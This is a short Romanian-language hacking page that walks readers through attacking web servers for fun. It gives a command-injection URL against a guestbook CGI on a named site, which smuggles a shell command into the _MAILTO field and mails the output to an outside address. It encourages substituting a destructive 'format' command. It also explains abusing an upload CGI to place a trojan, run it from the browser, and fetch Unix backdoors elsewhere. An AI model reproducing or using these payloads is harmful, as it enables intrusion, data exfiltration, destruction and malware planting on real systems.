Citeste toata pagina,help-ul este la sfarsit!
NOTE: Browserul trebuie sa suporte incarcarea.
...
Daca nu poti sa spargi site-ul,atunci blocheaza-l.
Vezi daca acel site contine cgi-bin/perl.exe apoi introdu numele site-ului in caseta de mai
jos si apasa enter.Site-ul asta are perl.exe.
Am mai gasit un exploit!:
Acest exploit executa comanda unix "ps -ax" si trimite rezultatul la
bebe2000@home.ro
http://www.andre.ro/cgi-bin/gbook/gbook.cgi?
_MAILTO=oops;ps%20-ax|mail%20 bebe2000@home.ro&
_POSTIT=yes&
_NEWONTOP=yes&
_SHOWEMAIL=yes&
_SHOWURL=yes&
_SHOWCOMMENT=yes&
_SHOWFROM=no&
_NAME=bebe2000&
_EMAIL= bebe2000@home.ro.&
_URL=http://www.home.ro&
_COMMENT=few&
_FROM=few
Evident toata comanda de sus trebuie sa fie pe o singura linie in browser!
Baga si tu o comanda adevarata in loc de "px -ax" (format) nu stiu daca merge sub unix.
bebe2000 nu merge dimineata!!Inlocuieste bebe2000@home.ro cu o adresa pe hotmail.
Cand vezi sursa paginii uite-te la formular si o sa vezi ceva de genul:
<..METHOD=POST ACTION="http://www.home.ro/cgi-win/uploader.exe/Uploads/">
Uploads este diectorul unde vei incarca tu fisierele,eventual index.html,dar eu nu am de
unde sa stiu ca acest director este chiar directorul unde au ele paginile de web publicate.
Schimba uploads cu cgi-win:
ACTION="http://www.andre.ro/cgi-win/uploader.exe/cgi-win/"
Apoi incarca cu ajutorul formulaului meu un troian pe care il executi din browser:
http://www.home.ro/cgi-win/server.exe?/
Daca sistemul de operare este Unix atunci server.exe nu ruleaza,gaseste un exploit pentru
Unix si ruleaza-l din browser.Pe astalavista gasesti troieni si backdoor-uri Unix.
Cele mai adevarate sunt scripturile cu extensia sh.
Distractie placuta!